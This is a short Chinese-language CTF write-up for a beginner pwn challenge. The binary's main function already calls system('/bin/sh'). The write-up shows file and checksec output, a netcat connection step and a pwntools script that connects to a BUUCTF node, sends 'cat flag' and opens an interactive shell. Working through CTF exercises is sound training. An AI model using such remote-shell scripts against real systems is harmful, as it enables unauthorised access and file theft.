解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:无需
- libc地址:无需
- BSS段地址:无需
劫持程序执行流程:
获得shell或flag:[[调用程序中的system]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file test
test: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b113b62556555e43d9397c04b24fc651d0f71a99, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=test
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 64) Symbols No 0 0test
libc版本:
wp借鉴:
核心伪代码分析:
存在利用的的代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
system("/bin/sh");
return 0;
}
分析:
直接执行即可,获得主机权限!
nc ip:端口号
cat ./flag
脚本:
from pwn import *
p = remote("node4.buuoj.cn",27296)
p.sendline("cat flag")
p.interactive()